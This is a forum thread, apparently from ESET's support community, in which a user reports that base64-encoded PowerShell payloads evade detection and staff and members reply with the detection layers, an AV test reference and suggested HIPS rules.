Sign in to follow this  
thrilla_killa

Latest ESET products not detecting apt tools

Recommended Posts

Posted (edited)

Is ESET supposed to detect apt actors or tools?  I am testing a framework (simple base64 encoded powershell payloads) and none of your products are detecting them?  All settings are verified as on.

Edited by Marcos
Case changed

Share this post


Link to post
Share on other sites

There are several layers that could detect such threat:
1, Detection by a signature.
2, Web access protection if the powershell script is downloaded from the Internet.
3, AMSI scanner upon execution of powershell.
4, Advanced memory scanner if the payload is a file that is executed.

The question is if the payload does something really malicious. Please contact samples[at]eset.com and provide details.

Share this post


Link to post
Share on other sites

Unfortunately, I am not providing my source code at this time.  I just wanted to advise that powershell, which is readily available on windows systems, can easily bypass the ESET systems and allow commands to be run from remote agents with ease.

 

Share this post


Link to post
Share on other sites
11 minutes ago, thrilla_killa said:

Unfortunately, I am not providing my source code at this time.  I just wanted to advise that powershell, which is readily available on windows systems, can easily bypass the ESET systems and allow commands to be run from remote agents with ease.

 

Unfortunately without a proof we cannot comment on it. Of course, no antivirus detects 100% of all threats, especially when it comes to scripts. And blocking all powershell scripts just because they could be misused is not a good solution either.

Peter Randziak likes this

Share this post


Link to post
Share on other sites
Posted (edited)
On ‎4‎/‎19‎/‎2018 at 1:30 PM, thrilla_killa said:

I am testing a framework (simple base64 encoded powershell payloads) and none of your products are detecting them?

For reference, you might want to refer to this ad hoc AV lab test done last summer by Malware Research Group using Win 10: https://www.mrg-effitas.com/current-state-of-malicious-powershell-script-blocking/ . Eset was one of the top scorers; only having issues with highly obfuscated scripts as also most other tested AV products did.

On non-Win 10 OS versions, packed, encrypted, and obfuscated scripts pose a real danger in that there is no way to examine those scripts until they load into memory and begin execution. If you aren't using Win 10 or for additional protection if you are, I recommended you create HIPS rules noted in this Eset KB article; especially the PowerShell related rules: https://support.eset.com/kb6119/ . These rules would only be problematic in an enterprise environment where custom PowerShell scripts are deployed.

Edited by itman
Peter Randziak likes this

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.